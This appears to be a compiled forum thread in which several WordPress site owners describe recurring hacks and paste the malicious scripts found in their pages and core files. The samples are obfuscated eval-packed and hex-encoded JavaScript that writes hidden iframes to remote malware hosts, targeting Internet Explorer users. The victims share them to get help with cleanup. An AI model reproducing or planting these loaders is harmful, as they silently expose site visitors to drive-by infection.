These are some screenshots while my website redirected to another site:
https://ibb.co/HD2BFhw
https://ibb.co/b2j4DMc

Thanks

https://drive.google.com/file/d/0BxeA28xMdEqIaWxZYU5ObFdqZkE/view?usp=sharing

I kept on removing the the script from the header files , but not able to get the permanent solution ..

For reference please check the source code of other websites also … same code is triggered to all website..as you can see in the screenshot,

website :- www.airconelevators.com
oxygymfitness.in

Any help would be appreciable .!
Thanks..!!

Anyway, this is a BIG problem and I don’t know how to fix it.

I’ve copied the injected injected code below. It appears in all the pages on my site, right below the <body …> tag. Interestingly it can only be seen by “inspecting element” in the browser; page source does not reveal it (I’ve added some line breaks to make it more readable, but this is exactly what shows up in my page.

This same problem occurs on every site where I upgrade to WP 4.3.1. I hope someone can fix this problem IMMEDIATELY!!

David McLeod

The injected code can be seen here: https://pastebin.com/ByME1EFt

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|91||src|height|193|width|board||51|php|206|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

It breaks the html/php and the site turns offline. I’ve already scanned installation with Sucuri/Wordfence/Anti Malware and cleaned it couple of times, but this issue comes back.

The wordpress and all the plugins are up to date, I’m using Woocommerce and couple other plugins (google sitemap, thesis/themedy, contact form 7).

I’m not a programmer, and I’m out of ideas. Does anyone have any suggestions on how could this be repaired?

Thank you and best regards.

According to the google webmaster tool this code was injected
in my homepage and in another inner page:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?
”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c
.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c
)]=k||e(c)}k=[function(e){return d[e]}];e=function(){retu
rn’\\w+’};c=1};while(c–){if(k){p=p.replace(new RegExp(‘\
\b’+e(c)+’\\b’,’g’),k)}}return p}(‘i 9(){a=6.h(\’b\’);7(!
a){5 0=6.j(\’k\’);6.g.l(0);0.n=\’b\’;0.4.d=\’8\’;0.4.c=\’8\’
;0.4.e=\’f\’;0.m=\’w://z.o.B/C.D?t=E\’}}5 2=A.x.q();7(((2.3(
“p”)!=-1&&2.3(“r”)==-1&&2.3(“s”)==-1))&&2.3(“v”)!=-1){5 t=u(
“9()”,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|M
akeFrameEx|element|yahoo_api|height|width|display|none|body|
getElementById|function|createElement|iframe|appendChild|src
|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http
|userAgent|1000|fgsdgsd|navigator|ai|showthread|php|72241732
‘.split(‘|’),0,{}))
</script>

All wordpress folders and files had and have 755 file permission.

Below are the scripts injected in the wordpress files. According to my hosting partner (one.com) someone got hold of my passwords, but I’ve seen that files been injected after I changed password to my site. I did not change the password to my wp-admin account last time since I didn’t suspect this to be a wordpress break in, but now I don’t know anymore…

Anyone that can decipher them? I’ve googled but haven’t found a way to do it.
I also would like someone to advice me what has happened and what to do to avoid this from happening again.

wp-includes\class-smtp.php
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E6B756E2D6C616E642E68752F63642F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

wp-includes\post.php
<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

wp-includes\query.php
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E706F726E67616C6C65726965737A2E636F6D2F73742F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

wp-includes\feed-rss2-comments.php
<script> var s='3C696672616D65207372633D22687474703A2F2F6C657A68756E7465722E636F6D2F73742F6373732F7A2F7374617469632E70687022206865696768743D223222207374796C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>